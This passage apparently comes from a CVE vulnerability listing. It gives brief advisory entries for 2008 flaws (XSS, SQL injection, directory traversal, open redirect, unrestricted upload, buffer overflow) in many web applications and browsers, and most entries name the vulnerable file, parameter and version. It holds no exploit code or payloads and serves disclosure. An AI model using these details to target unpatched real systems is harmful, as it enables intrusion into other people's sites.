EAP) before 4.2.0.CP03, and 4.3.0 before 4.3.0.CP01, allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. [CVE-2008-3261] Open redirect vulnerability in claroline/redirector.php in Claroline before 1.8.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. [CVE-2008-3260] Multiple cross-site scripting (XSS) vulnerabilities in Claroline before 1.8.10 allow remote attackers to inject arbitrary web script or HTML via (1) the cwd parameter in a rqMkHtml action to document/rqmkhtml.php, or the query string to (2) announcements/announcements.php, (3) calendar/agenda.php, (4) course/index.php, (5) course_description/index.php, (6) document/document.php, (7) exercise/exercise.php, (8) group/group_space.php, (9) phpbb/newtopic.php, (10) phpbb/reply.php, (11) phpbb/viewtopic.php, (12) wiki/wiki.php, or (13) work/work.php in claroline/. [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request. [CVE-2008-3255] Cross-site scripting (XSS) vulnerability in LunarNight Laboratory WebProxy 1.7.8 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3253] Cross-site scripting (XSS) vulnerability in the XenAPI HTTP interfaces in Citrix XenServer Express, Standard, and Enterprise Edition 4.1.0 [CVE-2008-3237] Cross-site scripting (XSS) vulnerability in forward_to_friend.php in ITechBids 7.0 Gold allows remote attackers to inject arbitrary web script or HTML via the productid parameter. [CVE-2008-3236] Unspecified vulnerability in Wsadmin in the System Management/Repository component in IBM WebSphere Application Server (WAS) 5.1 before 5.1.1.19 allows attackers to obtain sensitive information via vectors related to "previously encrypted properties" that are not encrypted. [CVE-2008-3235] Unspecified vulnerability in the PropFilePasswordEncoder utility in the Security component in IBM WebSphere Application Server (WAS) 5.1 before 5.1.1.19 has unknown impact and attack vectors. [CVE-2008-3233] Cross-site scripting (XSS) vulnerability in WordPress before 2.6, SVN development versions only, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3222] Session fixation vulnerability in Drupal 5.x before 5.9 and 6.x before 6.3, when contributed modules "terminate the current request during a login event," allows remote attackers to hijack web sessions via unknown vectors. [CVE-2008-3218] Multiple cross-site scripting (XSS) vulnerabilities in Drupal 6.x before 6.3 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) free tagging taxonomy terms, which are not properly handled on node preview pages, and (2) unspecified OpenID values. [CVE-2008-3213] SQL injection vulnerability in secciones/tablon/tablon.php in WebCMS Portal Edition allows remote attackers to execute arbitrary SQL commands via the id parameter to portal/index.php in a tablon action. NOTE: some of these details are obtained from third party information. [CVE-2008-3203] js/pages/pages_data.php in AuraCMS 2.2 through 2.2.2 does not perform authentication, which allows remote attackers to add, edit, and delete web content via a modified id parameter. [CVE-2008-3202] Cross-site scripting (XSS) vulnerability in index.php in Xomol CMS 1.2 allows remote attackers to inject arbitrary web script or HTML via the current_url parameter in a tellafriend action. NOTE: the provenance of this information is unknown [CVE-2008-3201] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Pagefusion 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) acct_fname and (2) acct_lname parameters in an edit action, and the (3) PID, (4) PGID, and (5) rez parameters. NOTE: the provenance of this information is unknown [CVE-2008-3198] Mozilla Firefox 3.x before 3.0.1 allows remote attackers to inject arbitrary web script into a chrome document via unspecified vectors, as demonstrated by injection into a XUL error page. NOTE: this can be leveraged to execute arbitrary code using CVE-2008-2933. [CVE-2008-3186] Multiple cross-site scripting (XSS) vulnerabilities in Chipmunk Blog (Blogger) allow remote attackers to inject arbitrary web script or HTML via the membername parameter to (1) members.php, (2) comments.php, (3) photos.php, (4) archive.php, or (5) cat.php. NOTE: the provenance of this information is unknown [CVE-2008-3184] Multiple cross-site scripting (XSS) vulnerabilities in vBulletin 3.6.10 PL2 and earlier, and 3.7.2 and earlier 3.7.x versions, allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO (PHP_SELF) or (2) the do parameter, as demonstrated by requests to upload/admincp/faq.php. NOTE: this issue can be leveraged to execute arbitrary PHP code. [CVE-2008-3180] Multiple cross-site scripting (XSS) vulnerabilities in upload/file/language_menu.php in ContentNow CMS 1.4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) pageid parameter or (2) PATH_INFO. [CVE-2008-3179] Directory traversal vulnerability in website.php in Web 2 Business (W2B) phpDatingClub (aka Dating Club) 3.7 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter. [CVE-2008-3178] Unrestricted file upload vulnerability in upload_pictures.php in WebXell Editor 0.1.3 allows remote attackers to execute arbitrary code by uploading a .php file with a jpeg content type, then accessing it via a direct request to the file in upload/. [CVE-2008-3177] Sophos virus detection engine 2.75 on Linux and Unix, as used in Sophos Email Appliance, Pure Message for Unix, and Sophos Anti-Virus Interface (SAVI), allows remote attackers to cause a denial of service (engine crash) via zero-length MIME attachments. [CVE-2008-3173] Microsoft Internet Explorer allows web sites to set cookies for domains that have a public suffix with more than one dot character, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session, aka "Cross-Site Cooking." NOTE: this issue may exist because of an insufficient fix for CVE-2004-0866. [CVE-2008-3172] Opera allows web sites to set cookies for country-specific top-level domains that have DNS A records, such as co.tv, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session, aka "Cross-Site Cooking." [CVE-2008-3171] Apple Safari sends Referer headers containing https URLs to different https web sites, which allows remote attackers to obtain potentially sensitive information by reading Referer log data. [CVE-2008-3170] Apple Safari allows web sites to set cookies for country-specific top-level domains, such as co.uk and com.au, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session, aka "Cross-Site Cooking," a related issue to CVE-2004-0746, CVE-2004-0866, and CVE-2004-0867. [CVE-2008-3161] Multiple cross-site scripting (XSS) vulnerabilities in jsp/common/system/debug.jsp in IBM Maximo 4.1 and 5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Accept, (2) Accept-Language, (3) UA-CPU, (4) Accept-Encoding, (5) User-Agent, or (6) Cookie HTTP header. NOTE: the provenance of this information is unknown [CVE-2008-3154] SQL injection vulnerability in index.php in WebBlizzard CMS allows remote attackers to execute arbitrary SQL commands via the page parameter. [CVE-2008-3130] Multiple cross-site scripting (XSS) vulnerabilities in index.php in OpenCart 0.7.7 allow remote attackers to inject arbitrary web script or HTML via the (1) firstname and (2) search parameters. NOTE: the provenance of this information is unknown [CVE-2008-3129] Multiple SQL injection vulnerabilities in index.php in Catviz 0.4 beta 1 allow remote attackers to execute arbitrary SQL commands via the (1) foreign_key_value paramter in the news page and (2) webpage parameter in the webpage_multi_edit form. [CVE-2008-3122] Multiple SQL injection vulnerabilities in Xerox CentreWare Web (CWW) before 4.6.46 allow remote authenticated users to execute arbitrary SQL commands via the unspecified vectors. [CVE-2008-3121] Multiple cross-site scripting (XSS) vulnerabilities in Xerox CentreWare Web (CWW) before 4.6.46 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3114] Unspecified vulnerability in Sun Java Web Start in JDK and JRE 6 before Update 7, JDK and JRE 5.0 before Update 16, and SDK and JRE 1.4.x before 1.4.2_18 allows context-dependent attackers to obtain sensitive information (the cache location) via an untrusted application, aka CR 6704074. [CVE-2008-3113] Unspecified vulnerability in Sun Java Web Start in JDK and JRE 5.0 before Update 16 and SDK and JRE 1.4.x before 1.4.2_18 allows remote attackers to create or delete arbitrary files via an untrusted application, aka CR 6704077. [CVE-2008-3112] Directory traversal vulnerability in Sun Java Web Start in JDK and JRE 6 before Update 7, JDK and JRE 5.0 before Update 16, and SDK and JRE 1.4.x before 1.4.2_18 allows remote attackers to create arbitrary files via the writeManifest method in the CacheEntry class, aka CR 6703909. [CVE-2008-3111] Multiple buffer overflows in Sun Java Web Start in JDK and JRE 6 before Update 4, JDK and JRE 5.0 before Update 16, and SDK and JRE 1.4.x before 1.4.2_18 allow context-dependent attackers to gain privileges via an untrusted application, as demonstrated by (a) an application that grants itself privileges to (1) read local files, (2) write to local files, or (3) execute local programs [CVE-2008-3101] Multiple cross-site scripting (XSS) vulnerabilities in vtiger CRM 5.0.4 allow remote attackers to inject arbitrary web script or HTML via (1) the parenttab parameter in an index action to the Products module, as reachable through index.php [CVE-2008-3100] Cross-site scripting (XSS) vulnerability in lib/owl.lib.php in Steve Bourgeois and Chris Vincent Owl Intranet Knowledgebase 0.95 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter in a getpasswd action to register.php. [CVE-2008-3098] Cross-site scripting (XSS) vulnerability in admin/usercheck.php in fuzzylime (cms) before 3.03 allows remote attackers to inject arbitrary web script or HTML via the user parameter to the login form. [CVE-2008-3097] Cross-site scripting (XSS) vulnerability in the Tinytax module (aka Tinytax taxonomy block) 5.x before 5.x-1.10-1 for Drupal allows remote authenticated users to inject arbitrary web script or HTML, probably by creating a crafted taxonomy term. [CVE-2008-3095] Cross-site scripting (XSS) vulnerability in the Organic Groups (OG) module 5.x before 5.x-7.3 and 6.x before 6.x-1.0-RC1, a module for Drupal, allows remote authenticated users, with group owner permissions, to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3091] Cross-site scripting (XSS) vulnerability in the Taxonomy Autotagger module 5.x before 5.x-1.8 for Drupal allows remote authenticated users, with create or edit post permissions, to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3088] Cross-site scripting (XSS) vulnerability in the Files module in Kasseler CMS 1.3.0 and 1.3.1 Lite allows remote attackers to inject arbitrary web script or HTML via the cid parameter in a Category action to index.php. [CVE-2008-3083] SQL injection vulnerability in Brightcode Weblinks (com_brightweblinks) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter. [CVE-2008-3082] Cross-site scripting (XSS) vulnerability in UPM/English/login/login.asp in Commtouch Enterprise Anti-Spam Gateway 4 and 5 allows remote attackers to inject arbitrary web script or HTML via the PARAMS parameter. [CVE-2008-3080] Cross-site request forgery (CSRF) vulnerability in admin.php in myWebland myBloggie 2.1.6 allows remote attackers to perform edit actions as administrators. NOTE: this can be leveraged to execute SQL commands by also exploiting CVE-2007-1899. [CVE-2008-3069] Multiple cross-site scripting (XSS) vulnerabilities in MyBB before 1.2.13 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) portal.php and (2) inc/functions_post.php. [CVE-2008-3063] SQL injection vulnerability in login.php in V-webmail 1.5.0 might allow remote attackers to execute arbitrary SQL commands via the username parameter. [CVE-2008-3061] Open redirect vulnerability in redirect.php in V-webmail 1.5.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the to parameter. [CVE-2008-3060] V-webmail 1.5.0 allows remote attackers to obtain sensitive information via (1) malformed input in the login page (includes/local.hooks.php) and (2) an invalid session ID, which reveals the installation path in an error message. [CVE-2008-3037] Cross-site scripting (XSS) vulnerability in the Address Directory (sp_directory) extension 0.2.10 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3032] Cross-site scripting (XSS) vulnerability in the phpMyAdmin (phpmyadmin) extension 3.0.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3029] Cross-site scripting (XSS) vulnerability in the WEC Discussion Forum (wec_discussion) extension 1.6.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3028] Multiple cross-site scripting (XSS) vulnerabilities in the Send-A-Card (sr_sendcard) extension 2.2.2 and earlier for TYPO3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3027] SQL injection vulnerability in get_article.php in VanGogh Web CMS 0.9 allows remote attackers to execute arbitrary SQL commands via the article_ID parameter to index.php. [CVE-2008-3023] Cross-site scripting (XSS) vulnerability in FreeStyle Wiki 3.6.2 and earlier, and 3.6.3 dev3 and earlier development versions, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2005-1799. [CVE-2008-2998] Multiple cross-site scripting (XSS) vulnerabilities in the Aggregation module 5.x before 5.x-4.4 for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2997] Cross-site scripting (XSS) vulnerability in index.php in Gravity Board X (GBX) 2.0 Beta allows remote attackers to inject arbitrary web script or HTML via the subject parameter in a postnewsubmit (aka create new thread) action. [CVE-2008-2994] Multiple cross-site scripting (XSS) vulnerabilities in PHPEasyData 1.5.4 allow remote attackers to inject arbitrary web script or HTML via the (1) annuaire parameter to (a) last_records.php and (b) annuaire.php and the (2) by and (3) cat_id parameters to annuaire.php. [CVE-2008-2991] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp Server 6 and 7 allows remote attackers to inject arbitrary web script or HTML via vectors related to the Help Errors log. [CVE-2008-2987] Multiple cross-site scripting (XSS) vulnerabilities in Benja CMS 0.1 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin_edit_submenu.php, (2) admin_new_submenu.php, and (3) admin_edit_topmenu.php in admin/. [CVE-2008-2984] Cross-site scripting (XSS) vulnerability in backend/umleitung.php in CMReams CMS 1.3.1.1 Beta 2 allows remote attackers to inject arbitrary web script or HTML via the lang[be_red_text] parameter. [CVE-2008-2980] Multiple cross-site scripting (XSS) vulnerabilities in HomePH Design 2.10 RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) error_meldung parameter to admin/features/register/register.php, the (2) feature_language[ueberschrift] parameter to admin/features/memberlist/memberlist.php, the (3) language_array[ueberschrift] parameter to admin/features/lostpassword/lostpassword.php, the (4) language_feature[titel] parameter to admin/features/kalender/eingabe.php, and the (5) language_feature[bildmenu] parameter to admin/features/fotogalerie/eingabe.php. [CVE-2008-2979] Multiple cross-site scripting (XSS) vulnerabilities in phpi/login.php in Ourvideo CMS 9.5 allow remote attackers to inject arbitrary web script or HTML via the (1) top_page and (2) end_page parameters. [CVE-2008-2975] Cross-site scripting (XSS) vulnerability in admin/objects/obj_image.php in TinX/cms 1.1 allows remote attackers to inject arbitrary web script or HTML via the language parameter. [CVE-2008-2973] Multiple cross-site scripting (XSS) vulnerabilities in chathead.php in MM Chat 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) sitename and (2) wmessage parameters. [CVE-2008-2970] Multiple session fixation vulnerabilities in Academic Web Tools (AWT YEKTA) 1.4.3.1, and 1.4.2.8 and earlier, allow remote attackers to hijack web sessions by setting the PHPSESSID parameter to (1) index.php and (2) login.php in homepg/. [CVE-2008-2969] Directory traversal vulnerability in download.php in Academic Web Tools (AWT YEKTA) 1.4.3.1, and 1.4.2.8 and earlier, allows remote attackers to read arbitrary files via a .. (dot dot) in the dfile parameter. [CVE-2008-2968] SQL injection vulnerability in rating.php in Academic Web Tools (AWT YEKTA) 1.4.3.1, and 1.4.2.8 and earlier, allows remote attackers to execute arbitrary SQL commands via the book_id parameter. [CVE-2008-2967] Multiple cross-site scripting (XSS) vulnerabilities in Academic Web Tools (AWT YEKTA) 1.4.3.1, and 1.4.2.8 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) query string to login.php and the (2) glb_sid parameter to hta/htmlarea.js.php, and allow remote authenticated users to inject arbitrary web script or HTML via an unspecified field in room.php. [CVE-2008-2965] Cross-site scripting (XSS) vulnerability in viewforum.php in JaxUltraBB (JUBB) 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the forum parameter. [CVE-2008-2962] Multiple cross-site scripting (XSS) vulnerabilities in MyBlog allow remote attackers to inject arbitrary web script or HTML via the (1) s and (2) sort parameters to index.php, and the (3) id parameter to post.php. [CVE-2008-2960] Cross-site scripting (XSS) vulnerability in phpMyAdmin before 2.11.7, when register_globals is enabled and .htaccess support is disabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving scripts in libraries/. [CVE-2008-2951] Open redirect vulnerability in the search script in Trac before 0.10.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the q parameter, possibly related to the quickjump function. [CVE-2008-2947] Cross-domain vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, and 7 allows remote attackers to access restricted information from other domains via JavaScript that uses the Object data type for the value of a (1) location or (2) location.href property, related to incorrect determination of the origin of web script, aka "Window Location Property Cross-Domain Vulnerability." NOTE: according to Microsoft, CVE-2008-2948 and CVE-2008-2949 are duplicates of this issue, probably different attack vectors. [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI. [CVE-2008-2925] SQL injection vulnerability in Webmatic before 2.8 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2008-2924] Cross-site scripting (XSS) vulnerability in Webmatic before 2.8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2923] Cross-site scripting (XSS) vulnerability in read/search/results in Lyris ListManager 8.8, 8.95, and 9.3d allows remote attackers to inject arbitrary web script or HTML via the words parameter. [CVE-2008-2914] SQL injection vulnerability in jobseekers/JobSearch3.php (aka the search module) in PHP JOBWEBSITE PRO allows remote attackers to execute arbitrary SQL commands via the (1) kw or (2) position parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-2911] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Contenido 4.8.4 allow remote attackers to inject arbitrary web script or HTML via the (1) contenido, (2) Belang, and (3) username parameters. [CVE-2008-2907] SQL injection vulnerability in admin/index.php in WebChamado 1.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the eml parameter. [CVE-2008-2906] SQL injection vulnerability in lista_anexos.php in WebChamado 1.1 allows remote attackers to execute arbitrary SQL commands via the tsk_id parameter. [CVE-2008-2903] SQL injection vulnerability in news.php in Advanced Webhost Billing System (AWBS) 2.3.3 through 2.7.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the viewnews parameter. [CVE-2008-2878] Open redirect vulnerability in rss_getfile.php in Academic Web Tools (AWT YEKTA) 1.4.3.1, and 1.4.2.8 and earlier, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the file parameter. [CVE-2008-2875] SQL injection vulnerability in index.php in Webdevindo-CMS 1.0.0 allows remote attackers to execute arbitrary SQL commands via the hal parameter. [CVE-2008-2873] sHibby sHop 2.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request to Db/urun.mdb. [CVE-2008-2871] Multiple cross-site scripting (XSS) vulnerabilities in template2.php in PEGames allow remote attackers to inject arbitrary web script or HTML via the (1) sitetitle, (2) sitenav, (3) sitemain, and (4) sitealt parameters. NOTE: the provenance of this information is unknown [CVE-2008-2861] Multiple cross-site scripting (XSS) vulnerabilities in eLineStudio Site Composer (ESC) 2.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) topic and (2) button parameters to ansFAQ.asp and the (3) id and (4) txtEmail parameters to login.asp. [CVE-2008-2860] SQL injection vulnerability in category.php in AJSquare AJ Auction Pro web 2.0 allows remote attackers to execute arbitrary SQL commands via the cate_id parameter. [CVE-2008-2858] SQL injection vulnerability in index.php in WebChamado 1.1 allows remote attackers to execute arbitrary SQL commands via the eml parameter. NOTE: the provenance of this information is unknown [CVE-2008-2855] Cross-site scripting (XSS) vulnerability in clanek.php in OwnRS Beta 3 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2008-2853] SQL injection vulnerability in index.php in Easy Webstore 1.2 allows remote attackers to execute arbitrary SQL commands via the cat_path parameter. [CVE-2008-2852] Cross-site scripting (XSS) vulnerability in CGIWrap before 4.1, when an Internet Explorer based browser is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to failure to set the charset in error messages. [CVE-2008-2849] Cross-site scripting (XSS) vulnerability in the TrailScout module 5.x before 5.x-1.4 for Drupal allows remote authenticated users, with create post permissions, to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2848] Cross-site scripting (XSS) vulnerability in the search functionality in MindTouch DekiWiki before 8.05.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2842] Cross-site scripting (XSS) vulnerability in edit/showmedia.asp in doITLive CMS 2.50 and earlier allows remote attackers to inject arbitrary web script or HTML via the FILE parameter. [CVE-2008-2839] Cross-site scripting (XSS) vulnerability in the search module in Traindepot 0.1 allows remote attackers to inject arbitrary web script or HTML via the query parameter to index.php. [CVE-2008-2836] PHP remote file inclusion vulnerability in send_reminders.php in WebCalendar 1.0.4 allows remote attackers to execute arbitrary PHP code via a URL in the includedir parameter and a 0 value for the noSet parameter, a different vector than CVE-2007-1483. [CVE-2008-2832] Unrestricted file upload vulnerability in calendar_admin.asp in Full Revolution aspWebCalendar 2008 allows remote attackers to upload and execute arbitrary code via the FILE1 parameter in an uploadfileprocess action, probably followed by a direct request to the file in calendar/eventimages/. [CVE-2008-2831] Multiple cross-site scripting (XSS) vulnerabilities in the delegated spam management feature in the Spam Quarantine Management (SQM) component in MailMarshal SMTP 6.0.3.8 through 6.3.0.0 allow user-assisted remote authenticated users to inject arbitrary web script or HTML via (1) the list of blocked senders or (2) the list of safe senders. [CVE-2008-2825] Cross-site scripting (XSS) vulnerability in the embedded Web Server in Xerox WorkCentre M123, M128, and 133 and WorkCentre Pro 123, 128, and 133 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2817] SQL injection vulnerability in albums.php in NiTrO Web Gallery 1.4.3 and earlier allows remote attackers to execute arbitrary SQL commands via the CatId parameter in a show action. [CVE-2008-2810] Mozilla Firefox before 2.0.0.15 and SeaMonkey before 1.1.10 do not properly identify the context of Windows shortcut files, which allows user-assisted remote attackers to bypass the Same Origin Policy via a crafted web site for which the user has previously saved a shortcut. [CVE-2008-2809] Mozilla 1.9 M8 and earlier, Mozilla Firefox 2 before 2.0.0.15, SeaMonkey 1.1.5 and other versions before 1.1.10, Netscape 9.0, and other Mozilla-based web browsers, when a user accepts an SSL server certificate on the basis of the CN domain name in the DN field, regard the certificate as also accepted for all domain names in subjectAltName:dNSName fields, which makes it easier for remote attackers to trick a user into accepting an invalid certificate for a spoofed web site. [CVE-2008-2797] Cross-site scripting (XSS) vulnerability in MainLayout.do in ManageEngine OpUtils 5.0 allows remote attackers to inject arbitrary web script or HTML via the hostName parameter, when viewing an SNMP graph. NOTE: the provenance of this information is unknown [CVE-2008-2788] Cross-site scripting (XSS) vulnerability in index.php in OpenDocMan 1.2.5 allows remote attackers to inject arbitrary web script or HTML via the redirection parameter. [CVE-2008-2787] Cross-site scripting (XSS) vulnerability in out.php in OpenDocMan 1.2.5 allows remote attackers to inject arbitrary web script or HTML via the last_message parameter. [CVE-2008-2783] Multiple cross-site scripting (XSS) vulnerabilities in Horde Groupware, Groupware Webmail Edition, and Kronolith allow remote attackers to inject arbitrary web script or HTML via the timestamp parameter to (1) week.php, (2) workweek.php, and (3) day.php [CVE-2008-2777] Cross-site scripting (XSS) vulnerability in Ortro before 1.3.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2776] Cross-site scripting (XSS) vulnerability in search.asp in DT Centrepiece 4.0 allows remote attackers to inject arbitrary web script or HTML via the searchFor parameter. NOTE: the provenance of this information is unknown [CVE-2008-2773] Cross-site scripting (XSS) vulnerability in the Taxonomy Image module 5.x before 5.x-1.3 and 6.x before 6.x-1.3, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2768] Cross-site scripting (XSS) vulnerability in admin/search.asp in Xigla Poll Manager XE allows remote authenticated users with administrator role privileges to inject arbitrary web script or HTML via unspecified vectors ("all fields"). [CVE-2008-2766] Cross-site scripting (XSS) vulnerability in Xigla Absolute Image Gallery XE allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in (1) admin/search.asp and (2) gallery.asp. [CVE-2008-2764] Cross-site scripting (XSS) vulnerability in admin/search.asp in Xigla Absolute Live Support XE 5.1 allows remote authenticated administrators to inject arbitrary web script or HTML via unspecified vectors ("all fields"). [CVE-2008-2761] Multiple cross-site scripting (XSS) vulnerabilities in Xigla Absolute Banner Manager XE 2.0 allow remote authenticated administrators to inject arbitrary web script or HTML via the text parameter in (1) searchbanners.asp and (2) listadvertisers.asp, and other unspecified fields. NOTE: some of these details are obtained from third party information. [CVE-2008-2759] Multiple cross-site scripting (XSS) vulnerabilities in Xigla Absolute Form Processor XE 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) showfields, (2) text, and (3) submissions parameters to search.asp and the (4) name parameter to users.asp. NOTE: some of these details are obtained from third party information. [CVE-2008-2758] Multiple cross-site scripting (XSS) vulnerabilities in Xigla Absolute News Manager XE 3.2 allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) pblname and (2) text parameters to (a) admin/search.asp, (3) name parameter to (b) admin/publishers.asp, and other unspecified vectors to (c) anmviewer.asp and (d) editarticleX.asp in admin/. NOTE: some of these details are obtained from third party information. [CVE-2008-2756] Cross-site scripting (XSS) vulnerability in admin/users.asp in Xigla Absolute Control Panel XE 1.0 allows remote attackers to inject arbitrary web script or HTML via the name parameter and other unspecified parameters. NOTE: some of these details are obtained from third party information. [CVE-2008-2744] Cross-site scripting (XSS) vulnerability in vBulletin 3.6.10 and 3.7.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors and an "obscure method." NOTE: the vector is probably in the redirect parameter to the Admin Control Panel (admincp/index.php). [CVE-2008-2743] Cross-site scripting (XSS) vulnerability in the embedded web server in Xerox 4110, 4590, and 4595 Copier/Printers allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2008-2720] Cross-site scripting (XSS) vulnerability in Menalto Gallery before 2.2.5 allows remote attackers to inject arbitrary web script or HTML via the (1) host and (2) path components of a URL. [CVE-2008-2718] Cross-site scripting (XSS) vulnerability in fe_adminlib.inc in TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, as used in extensions such as (1) direct_mail_subscription, (2) feuser_admin, and (3) kb_md5fepw, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2714] Opera before 9.26 allows remote attackers to misrepresent web page addresses using "certain characters" that "cause the page address text to be misplaced." [CVE-2008-2700] SQL injection vulnerability in view.php in Galatolo WebManager 1.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2008-2699] Multiple directory traversal vulnerabilities in Galatolo WebManager (GWM) 1.0 allow remote attackers to include and execute arbitrary local files via directory traversal sequences in (1) the plugin parameter to admin/plugins.php or (2) the com parameter to index.php. [CVE-2008-2698] Multiple cross-site scripting (XSS) vulnerabilities in photo_add-c.php (aka the "add comment" section) in WEBalbum 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) comment, (2) id, or (3) category parameter. [CVE-2008-2694] Cross-site scripting (XSS) vulnerability in search.php in phpInv 0.8.0 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. [CVE-2008-2686] webinc/bxe/scripts/loadsave.php in Flux CMS 1.5.0 and earlier allows remote attackers to execute arbitrary code by overwriting a PHP file in webinc/bxe/scripts/ via a filename in the XML parameter and PHP sequences in the request body, then making a direct request for this filename. [CVE-2008-2680] Multiple cross-site scripting (XSS) vulnerabilities in _db/compact.asp in Realm CMS 2.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) CmpctedDB and (2) Boyut parameters. [CVE-2008-2677] Cross-site scripting (XSS) vulnerability in edit1.php in Telephone Directory 2008 allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2008-2675] Cross-site scripting (XSS) vulnerability in index.php in PHP Image Gallery allows remote attackers to inject arbitrary web script or HTML via the action parameter. NOTE: the provenance of this information is unknown [CVE-2008-2668] Multiple cross-site scripting (XSS) vulnerabilities in yBlog 0.2.2.2 allow remote attackers to inject arbitrary web script or HTML via (1) the q parameter to search.php, or the n parameter to (2) user.php or (3) uss.php. [CVE-2008-2652] Multiple SQL injection vulnerabilities in catalog.php in SMEWeb 1.4b and 1.4f allow remote attackers to execute arbitrary SQL commands via the (1) idp and (2) category parameters. [CVE-2008-2646] Multiple cross-site scripting (XSS) vulnerabilities in meBiblio 0.4.7 allow remote attackers to inject arbitrary web script or HTML via the (1) sql parameter to dbadd.inc.php, (2) InsertJournal parameter to add_journal_mask.inc.php, (3) InsertBibliography parameter to insert_mask.inc.php, and (4) LabelYear parameter to search_mask.inc.php. [CVE-2008-2644] Multiple cross-site scripting (XSS) vulnerabilities in SMEWeb 1.4b and 1.4f allow remote attackers to inject arbitrary web script or HTML via the (1) data parameter to catalog.php, the (2) keyword parameter to search.php, the (3) page parameter to bb.php, and the (4) new_s parameter to order.php. [CVE-2008-2640] Multiple cross-site scripting (XSS) vulnerabilities in the Flex 3 History Management feature in Adobe Flex 3.0.1 SDK and Flex Builder 3, and generated applications, allow remote attackers to inject arbitrary web script or HTML via the anchor identifier to (1) client-side-detection-with-history/history/historyFrame.html, (2) express-installation-with-history/history/historyFrame.html, or (3) no-player-detection-with-history/history/historyFrame.html in templates/html-templates/. NOTE: Firefox 2.0 and possibly other browsers prevent exploitation. [CVE-2008-2638] Static code injection vulnerability in guestbook.php in 1Book 1.0.1 and earlier allows remote attackers to upload arbitrary PHP code via the message parameter in an HTML webform, which is written to data.php. [CVE-2008-2637] Multiple cross-site scripting (XSS) vulnerabilities in F5 FirePass SSL VPN 6.0.2 hotfix 3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via quotes in (1) the css_exceptions parameter in vdesk/admincon/webyfiers.php and (2) 